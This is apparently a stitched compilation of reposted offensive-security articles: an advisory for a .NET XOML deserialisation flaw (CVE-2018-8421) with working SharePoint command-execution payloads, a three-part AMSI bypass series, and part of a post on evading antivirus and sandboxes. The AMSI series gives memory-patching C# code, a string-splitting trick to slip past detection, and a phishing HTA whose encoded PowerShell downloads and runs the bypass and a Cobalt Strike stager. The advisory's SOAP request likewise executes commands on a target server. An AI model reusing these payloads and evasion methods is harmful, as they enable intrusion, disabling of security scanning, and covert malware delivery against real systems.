Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data

( Original text by Soroush Dalili )

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: .NET Framework before September 2018 patch
Systems Affected: .NET Framework Workflow library
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8421 
Risk: Critical

Summary

In the .NET Framework, workflows can be created by compiling an XOML file using the libraries within the System.Workflow namespace. The workflow compiler can use the /nocode and /checktypesarguments to stop execution of untrusted code. The /nocode is used to disallow the code-behind model that checked the workflows on the server-side to ensure they do not contain any code. The second argument is used to only allow whitelisted types from the configuration file.

All these protection mechanisms could be bypassed by exploiting a deserialisation issue similar to CVE-2018-8284 that was reported previously (https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint/).

Location

The Microsoft (R) Windows Workflow Compiler tool was used as a proof of concept to compile the following XOML files in order to execute code or commands. This tool was used with /nocode/checktypes in order to show that code could still be executed:

wfc test.xoml /nocode:+ /checktypes:+

Although only the first example worked on the SharePoint application, it should be noted that it could potentially be vulnerable to command execution by discovering other gadgets within the used libraries or by spending more time on finding a way to load arbitrary namespaces.

Impact

Low privileged SharePoint users by default have access to their personal sites and can create workflows for themselves. Therefore, authenticated users of SharePoint could potentially execute commands on the server similar to https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint/.

Other applications that compile XOML files are also susceptible to code execution.

Details

In order to provide examples to exploit this vulnerability, a number of gadgets were used based on the whitepaper written by Alvaro Muñoz and Oleksandr Mirosh, Friday the 13th JSON Attacks (https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf).

Example 1 – using ObjectDataProvider

The following example shows an XOML file that could be used to call a method within an arbitrary library (in this example: System.Diagnostics.Process.Start()) without passing any parameters:

<SequentialWorkflowActivity x:Class="." x:Name="Workflow2" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
     <Rd:ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                         xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                         xmlns:System="clr-namespace:System;assembly=mscorlib, Version=4.0.0.0,    
Culture=neutral, PublicKeyToken=b77a5c561934e089"
                         xmlns:Diag="clr-namespace:System.Diagnostics;assembly=System,             
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
                         xmlns:Rd="clr-namespace:System.Windows;Assembly=PresentationFramework, 
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
                         xmlns:ODP="clr-
namespace:System.Windows.Data;Assembly=PresentationFramework, Version=4.0.0.0, Culture=neutral,    
PublicKeyToken=31bf3856ad364e35"
                   >   
      <ODP:ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}"                 
MethodName="Start">
      </ODP:ObjectDataProvider>
    </Rd:ResourceDictionary>
</SequentialWorkflowActivity>

By compiling the above file or by sending it to a SharePoint server, the following error message was received showing the code was executed:

Cannot start process because a file name has not been provided

Although it was not possible to find a way to pass parameters to the targeted method, this could still be dangerous by identifying a method that could perform an important action (such as a method that can reset some settings) on the server-side.

Example 2 – using WorkflowDesigner

The following XOML file could execute a command to open calculator during compile time:

When the class name was invalid, the code was executed twice despite having an error:

<SequentialWorkflowActivity x:Class="INVALID!" x:Name="foobar"
                            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
  <sap:WorkflowDesigner
    PropertyInspectorFontAndColorData="&lt;ResourceDictionary xmlns=&quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&quot; xmlns:x=&quot;http://schemas.microsoft.com/winfx/2006/xaml&quot; xmlns:System=&quot;clr-namespace:System;assembly=mscorlib&quot; xmlns:Diag=&quot;clr-namespace:System.Diagnostics;assembly=system&quot;&gt;&lt;ObjectDataProvider x:Key=&quot;LaunchCmd&quot; ObjectType=&quot;{x:Type Diag:Process}&quot; MethodName=&quot;Start&quot;&gt;&lt;ObjectDataProvider.MethodParameters&gt;&lt;System:String&gt;cmd&lt;/System:String&gt;&lt;System:String&gt;/c calc &lt;/System:String&gt;&lt;/ObjectDataProvider.MethodParameters&gt;&lt;/ObjectDataProvider&gt;&lt;/ResourceDictionary&gt;"
               xmlns:sap="clr-
namespace:System.Activities.Presentation;assembly=System.Activities.Presentation, 
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
                         >
  </sap:WorkflowDesigner>
</SequentialWorkflowActivity>

When the class name was valid, the code was executed once but with an error:

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar"
                            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
   <sap:WorkflowDesigner
     PropertyInspectorFontAndColorData="&lt;ResourceDictionary xmlns=&quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&quot; xmlns:x=&quot;http://schemas.microsoft.com/winfx/2006/xaml&quot; xmlns:System=&quot;clr-namespace:System;assembly=mscorlib&quot; xmlns:Diag=&quot;clr-namespace:System.Diagnostics;assembly=system&quot;&gt;&lt;ObjectDataProvider x:Key=&quot;LaunchCmd&quot; ObjectType=&quot;{x:Type Diag:Process}&quot; MethodName=&quot;Start&quot;&gt;&lt;ObjectDataProvider.MethodParameters&gt;&lt;System:String&gt;cmd&lt;/System:String&gt;&lt;System:String&gt;/c calc &lt;/System:String&gt;&lt;/ObjectDataProvider.MethodParameters&gt;&lt;/ObjectDataProvider&gt;&lt;/ResourceDictionary&gt;"
       xmlns:sap="clr-
namespace:System.Activities.Presentation;assembly=System.Activities.Presentation, 
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
                         >
  </sap:WorkflowDesigner>
</SequentialWorkflowActivity>

Although the above payload worked successfully when compiled in Visual Studio or using the WFC command (even with /nocode /checktypes flags), it showed the following error message when tested in SharePoint:

The type or namespace name 'Presentation' does not exist in the namespace 'System.Activities' (are you missing an assembly reference?)

Example 3 – using AssemblyInstaller:

The following example shows another deserialisation gadget that needed an arbitrary DLL file to exist on the server. This DLL file was created using a technique described at https://blog.cylance.com/implications-of-loading-net-assemblies.

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobarx"
                            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
                            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
   <sci:AssemblyInstaller Path="c:\path\Source.dll" xmlns:sci="clr-namespace:System.Configuration.Install;assembly=System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
   </sci:AssemblyInstaller>
</SequentialWorkflowActivity>

The above payload did not work in SharePoint as it could not find the namespace.

Recommendation

Apply the September 2018 Microsoft patch.

Vendor Communication

17/05/2018 Reported to Microsoft

17/05/2018 Case number assigned by Microsoft

11/09/2018 Patch was released

13/09/2018 Microsoft was contacted to check whether the reporter could publish the details
24/09/2018 Microsoft asked for more time before releasing the details to fix some crashes caused by the fix

02/11/2018 Permission granted from Microsoft to publish the details

Update (11/11/2018)

After releasing the initial potential code execution PoC on SharePoint, Soroush recevied a tip from Alvaro on Twitter to also try ProcessStartInfo and ObjectInstance. This method worked successfully after creating an appropriate XAML and including the required namespaces.

It is therefore now possible to execute code and commands on an unpatched server which increases risk of this issue from high to critical. Note that the .NET Framework needs updating rather than SharePoint in order to patch this issue similar to CVE-2018-8284.

The following HTTP POST request shows a PoC that could execute code on SharePoint:

POST /_vti_bin/webpartpages.asmx HTTP/1.1
Host: TargetHost
SOAPAction: http://microsoft.com/sharepoint/webpartpages/ValidateWorkflowMarkupAndCreateSuppor
tObjects
Content-Type: text/xml; charset=utf-8
Content-Length: 1709
Cookie: [valid cookies or authorization header instead - fixed by burp]

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body<ValidateWorkflo
wMarkupAndCreateSupportObjects 
xmlns="http://microsoft.com/sharepoint/webpartpages"><workflowMarkupText><![CDATA[
<SequentialWorkflowActivity x:Class="." x:Name="Workflow2" 
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<Rd:ResourceDictionary xmlns:System="clr-namespace:System;assembly=mscorlib, 
Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089" xmlns:Diag="clr-
namespace:System.Diagnostics;assembly=System,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" xmlns:Rd="clr-
namespace:System.Windows;Assembly=PresentationFramework,
Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" 
xmlns:ODP="clr-namespace:System.Windows.Data;Assembly=PresentationFramework, 
Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=31bf3856ad364e35">
<ODP:ObjectDataProvider x:Key="LaunchCmd" MethodName="Start">
<ObjectDataProvider.ObjectInstance><Diag:Process><Diag:Process.StartInfo><Diag:Pro
cessStartInfo FileName="cmd.exe" Arguments="/c ping 
foobar.gyi5bjohiab9obycusymb22tkkqaez.burpcollaborator.net"></Diag:ProcessStartInf
o></Diag:Process.StartInfo></Diag:Process>
</ObjectDataProvider.ObjectInstance>
</ODP:ObjectDataProvider>
</Rd:ResourceDictionary>
</SequentialWorkflowActivity>
]]></workflowMarkupText>
<rulesText></rulesText><configBlob></configBlob><flag>2</flag></ValidateWorkflowMa
rkupAndCreateSupportObjects></soap:Body></soap:Envelope>

If a path was not accessible, the server returned System.IO.FileNotFoundException, and when access was not sufficient to create, change or validate a workflow, the server responded with the System.NullReferenceException: Object reference not set to an instance of an object error message. Normally authenticated users should be able to create workflows in their spaces. The personal site can normally be found by going to the /my path and that should redirect users to their personal site (if it exists) then the payload can be sent to:

/my/personal/[SomeName]/[SomeSiteName]/_vti_bin/webpartpages.asmx

or

/my/personal/[yourUsername]/_vti_bin/webpartpages.asmx

If users have control over any other sites in SharePoint to create workflows, those paths can be used also.

The following GIF video file shows this issue in practice, exploited to obtain a reverse shell where the permissions were sufficient:

 

 

Реклама

AmsiScanBuffer Bypass — Part 3

( Original text by  )

In Part 2, we engineered a delivery method for the AmsiScanBuffer Bypass discussed in Part 1. In this post, we’ll make some modifications to the bypass itself.

If you read Part 1 and the original posts from CyberArk, you will know that the bypass works by patching the AMSI DLL in memory. But before we make any modifications to the bypass — let’s explore that in some additional detail, so we all have a clear baseline understanding.

Bypass Primer

We can use API Monitor to have a peak at what’s going on.

To summerise what we’re looking at:

  1. powershell.exe starts and amsi.dll is loaded into its memory space.
  2. We type something into the console.
  3. The AmsiScanBuffer function is called.
  4. Where our input is passed into.

This is the AmsiScanBuffer function as documented by Microsoft:

HRESULT AmsiScanBuffer(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result
);

We won’t worry about all of this — just the idea that we have a buffer of length, that when scanned, returns a result. To help visualise the bypass, let’s throw PowerShell into a debugger.

We’ll set a breakpoint on the AmsiScanBuffer function and type something into the console.

We step down to the mov edi, r8d instruction — because we know from CyberArk that r8d contains the length of the buffer. We can also see that in Binary Ninja.

After the instruction, both edi and r8d contain 2c — which in decimal is 44. Our string "this is some garbage" is 22 characters, so this checks out (bits and bytes, amirite). In the context of AmsiScanBuffer, it’s saying “scan 22 bytes of this buffer”.

The bypass works by slightly patching this instruction — changing mov edi, r8d to xor edi, edi. Because if you xor two identical values, i.e. the current value of edi (whatever it happens to be) with itself, the result is always 0. So if we run the bypass and look at the instructions again…

edi is now zero — i.e. “scan 0 bytes of this buffer”. So if AmsiScanBuffer scans 0 bytes, it will not actually scan anything at all.

AMSI_RESULT_CLEAN

So the whole reason for this post, is that I was talking to Kuba Gretzky about the bypass after I’d posted my Part 1. He said:

the risky part with the bypass is that it uses a fixed offset from the start of the function AmsiScanBufferPtr + 0x001b. MS can just slightly modify the AmsiScanBuffer function and the bypass will result in a crash. It would be wiser to do hotpatching at the beginning of the function to return a result that would say that nothing was found.

If we have have a look at the AMSI_RESULT details that we glossed over previously — there are different results that can be returned.

typedef enum AMSI_RESULT {
  AMSI_RESULT_CLEAN,
  AMSI_RESULT_NOT_DETECTED,
  AMSI_RESULT_BLOCKED_BY_ADMIN_START,
  AMSI_RESULT_BLOCKED_BY_ADMIN_END,
  AMSI_RESULT_DETECTED
} ;

So could we just patch the function so that it always returns AMSI_RESULT_CLEAN?

Revisiting the AmsiScanBuffer function in Binary Ninja, we can see there are a whole bunch of instructions followed by conditional jumps, but all to the same address: 0x180024f5.

The content of which is a mov eax, 0x80070057 instruction, which we guessed meant AMSI_RESULT_CLEAN.

The original bypass was:

Byte[] Patch = { 0x31, 0xff, 0x90 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
Marshal.Copy(Patch, 0, unmanagedPointer, 3);
MoveMemory(ASBPtr + 0x001b, unmanagedPointer, 3);

Which we modified to:

Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
MoveMemory(ASBPtr, unmanagedPointer, 6);

Where 0xB8, 0x57, 0x00, 0x07, 0x80 are the (hex) opcodes for mov eax, 0x80070057; and 0xC3 is a retn. And notice there is no offset — we are patching the first two instructions in the function.

Before we carry out this patch, we can verify those first two instructions at the AmsiScanBuffer pointer.

They match what we expect from Binary Ninja. If we implement our new patch and look again…

The rest of the instructions become a bit munged, but that doesn’t matter. Hopefully we’ll just enter AmsiScanBuffer, immediately set eax and return.

Which seems to work just fine.

This is no “better” than the previous bypass, but hopefully will be a little more resilient against future modifications to amsi.dll by Microsoft.

AmsiScanBuffer Bypass — Part 2

( Original text by  )

In Part 1, we had a brief look at the AmsiScanBuffer bypass technique. We found some circumstances where the bypass code would be identified as malicious before it could be executed (which turned out to be a simple string detection), and modified the code to circumvent this.

In this post, we’ll explore a delivery method to help stage a Cobalt Strike / Empire / <insert framework here> agent. As with Part 1, this is not about some 1337 code drop — it’s a demonstration of how I walked through engineering the final result.

So, let’s get cracking.

Before we start, we have a few goals in mind:

  1. Deliver “something” to a user, via a phish or some other social engineering event.
  2. The initial payload should ideally have a small footprint. We don’t want to deliver everything in one go.
  3. Perform the AMSI bypass.
  4. If the bypass was successful, stage a beacon.
  5. Otherwise, run for the hills.

For the delivery method, we’ll use an HTA with a PowerShell payload. That payload will pull and execute the AMSI Bypass code, then if successful, pull and execute the beacon stager. Simple 🙂

Generate Stager

We’ll start by generating a simple stager, host it on a web server and just verify that AMSI does indeed prevent it from running. We’ll be serving these payloads using download cradles, so it’s always worth making sure they behave as you expect.

AMSI Bypass

For the AMSI Bypass payload, we’ll throw the C# source into a PowerShell script and use Add-Type to make it available within the PowerShell session.

$Ref = (
«System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089«,
«System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a«
)
$Source =
using System;
using System.Runtime.InteropServices;
namespace Bypass
{
public class AMSI
{
[DllImport(«kernel32»)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport(«kernel32»)]
public static extern IntPtr LoadLibrary(string name);
[DllImport(«kernel32»)]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport(«Kernel32.dll», EntryPoint = «RtlMoveMemory», SetLastError = false)]
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
public static int Disable()
{
IntPtr TargetDLL = LoadLibrary(«amsi.dll»);
if (TargetDLL == IntPtr.Zero) { return 1; }
IntPtr ASBPtr = GetProcAddress(TargetDLL, «Amsi» + «Scan» + «Buffer»);
if (ASBPtr == IntPtr.Zero) { return 1; }
UIntPtr dwSize = (UIntPtr)5;
uint Zero = 0;
if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
Byte[] Patch = { 0x31, 0xff, 0x90 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
Marshal.Copy(Patch, 0, unmanagedPointer, 3);
MoveMemory(ASBPtr + 0x001b, unmanagedPointer, 3);
return 0;
}
}
}
«@
Add-Type ReferencedAssemblies $Ref TypeDefinition $Source Language CSharp
view rawASBBypass.ps1 hosted with ❤ by GitHub

We’ll then test it out by downloading and executing it, then running the stager that failed earlier.

All good so far.

Next step is to hook in the logic for deciding whether the AMSI bypass was successful. There are a couple of opportunities in the Disable() function where it returns an int of 1 if something fails and 0 if it makes it to the end.

So in pseudo-code we can say something like execute bypass; if (bypass -eq "0") { execute stager }. If bypass returns 1, we naturally don’t do anything more.

HTA

To execute that PowerShell inside an HTA, we can base64 encode it so we don’t have to worry about escaping characters.

$string = 'iex ((new-object net.webclient).downloadstring("http://192.168.214.129/amsi-bypass")); if([Bypass.AMSI]::Disable() -eq "0") { iex ((new-object net.webclient).downloadstring("http://192.168.214.129/stager")) }'

[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($string))

The final HTA is nice and small.

<script language="VBScript">
    Function var_func()
        Dim var_shell
        Set var_shell = CreateObject("Wscript.Shell")
        var_shell.run "powershell.exe -nop -w 1 -enc aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAxADQALgAxADIAOQAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAiACkAKQA7ACAAaQBmACgAWwBCAHkAcABhAHMAcwAuAEEATQBTAEkAXQA6ADoARABpAHMAYQBiAGwAZQAoACkAIAAtAGUAcQAgACIAMAAiACkAIAB7ACAAaQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAxADQALgAxADIAOQAvAHMAdABhAGcAZQByACIAKQApACAAfQA=", 0, true
    End Function

    var_func
    self.close
</script>

Finally, we host the HTA and test it with C:\Users\Rasta>mshta http://192.168.214.129/delivery.hta.

The web logs show us exactly what we expect.

  1. AMSI download
  2. Stager download
  3. Beacon checkin
10/31 11:22:44 visit from: 192.168.214.1
    Request: GET /amsi-bypass
    page Serves /opt/cobaltstrike/uploads/AMSIBypass.ps1
    null

10/31 11:22:44 visit from: 192.168.214.1
    Request: GET /stager
    page Serves /opt/cobaltstrike/uploads/stager.ps1
    null

10/31 11:22:44 visit from: 192.168.214.1
    Request: GET /__init.gif
    beacon beacon stager x64
    Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)

Awesome sauce. And for those who want it, I also uploaded the code to GitHub.

AmsiScanBuffer Bypass — Part 1

( Original text by  )

Andre Marques recently posted a pretty nice write-up for circumventing AMSI, based on previous work by CyberArk.

Please read these for all the technical details — we’re launching this post with the C# code from Andre:

using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);


        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            if (TargetDLL == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve amsi.dll pointer.");
                return 1;
            }

            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");
            if (AmsiScanBufferPtr == IntPtr.Zero)
            {
                Console.WriteLine("ERROR: Could not retrieve AmsiScanBuffer function pointer");
                return 1;
            }

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;
            if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero))
            {
                Console.WriteLine("ERROR: Could not change AmsiScanBuffer memory permissions!");
                return 1;
            }

            /*
             * This is a new technique, and is still working.
             * Source: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
             */
            Byte[] Patch = { 0x31, 0xff, 0x90 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
            MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

            Console.WriteLine("AmsiScanBuffer patch has been applied.");
            return 0;
        }
    }
}

I don’t think it’s clear from Andre’s post which version of Windows 10 he was testing against, but the CyberArk post specifically references 1709 (17074) and was originally posted on 23 May 2018. Microsoft have been doing a really effective job as of late, with keeping Defender and AMSI up-to-date. Even though MSRC said they would not fix it, they did say:

We don’t see this as a security vulnerability – but we’ll definitely look into what we can do to prevent (or detect) this type of attacks.

So at the time of writing (29 October 2018), I’m on Windows 10 1803 (17134). Does this bypass still work? Turns out the answer is yes, and no.

I copied the code verbatim, compiled to a DLL and attempted to load it via reflection, which failed:

Not a good start.

I had some suspects in mind, such as:

  • IntPtr TargetDLL = LoadLibrary("amsi.dll"); <- Maybe just loading AMSI is bad, but unlikely.
  • IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer"); <- Finding the address of AmsiScanBuffer.
  • if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero)) <- Modifying the permissions of a memory region.

And pretty much all of this…

Byte[] Patch = { 0x31, 0xff, 0x90 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
Marshal.Copy(Patch, 0, unmanagedPointer, 3);
MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

Because the code is relatively short, I thought I would just step through it line-by-line to see if I could find the offending content. I did this in PowerShell ISE, by putting all the C# into a text variable and “running” the script. Then, systematically removing a couple of lines of code each time, until I got to the point AMSI wasn’t flagging anymore.

To simplfy the process, I shortened the code a bit more by removing the if statements and removing console output. So my version became:

using System;
using System.Runtime.InteropServices;

namespace Bypass
{
    public class AMSI
    {
        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string name);
        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
        static extern void MoveMemory(IntPtr dest, IntPtr src, int size);

        public static int Disable()
        {
            IntPtr TargetDLL = LoadLibrary("amsi.dll");
            IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");

            UIntPtr dwSize = (UIntPtr)5;
            uint Zero = 0;

            VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero);

            Byte[] Patch = { 0x31, 0xff, 0x90 };
            IntPtr unmanagedPointer = Marshal.AllocHGlobal(3);
            Marshal.Copy(Patch, 0, unmanagedPointer, 3);
            MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);

            return 0;
        }
    }
}

Eventually, I found only 3 lines were causing the alerts. IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer");if (!VirtualProtect(AmsiScanBufferPtr, dwSize, 0x40, out Zero)) and MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3);.

The one thing they all have in common…? Yep, the string (or substring) AmsiScanBuffer!

You can actually test this by just typing it into a PowerShell window…

And some funny consequences…

It’s also worth noting "Amsi Scan Buffer" also flags, but others like "AmsixScanxBuffer" or "Amsi.Scan.Buffer" are fine.

But this also means the reason my first reflection test failed, was probably down to this string being in my path and not the actual file itself. So I renamed everything and tried again…

Success.

This is still only a “somewhat limited” solution, because there are more ways we might want to load this code. If we want to use this directly in a PowerShell script, we could do [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("")) without issue, which to be honest, is probably the most elegant way.

But if we want to do it this way, we’re still stuck.

$Ref = (
    [...]
)

$Source = @"
[...]
"@

Add-Type [...]

Of course, this is relatively straight forward to fix.

IntPtr AmsiScanBufferPtr = GetProcAddress(TargetDLL, "AmsiScanBuffer"); becomes IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");.

VirtualProtect(AmsiScanBufferPtr, (UIntPtr) 5, 0x40, out uint Zero); becomes VirtualProtect(ASBPtr, dwSize, 0x40, out Zero);.

MoveMemory(AmsiScanBufferPtr + 0x001b, unmanagedPointer, 3); becomes MoveMemory(ASBPtr + 0x001b, unmanagedPointer, 3);.

 

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

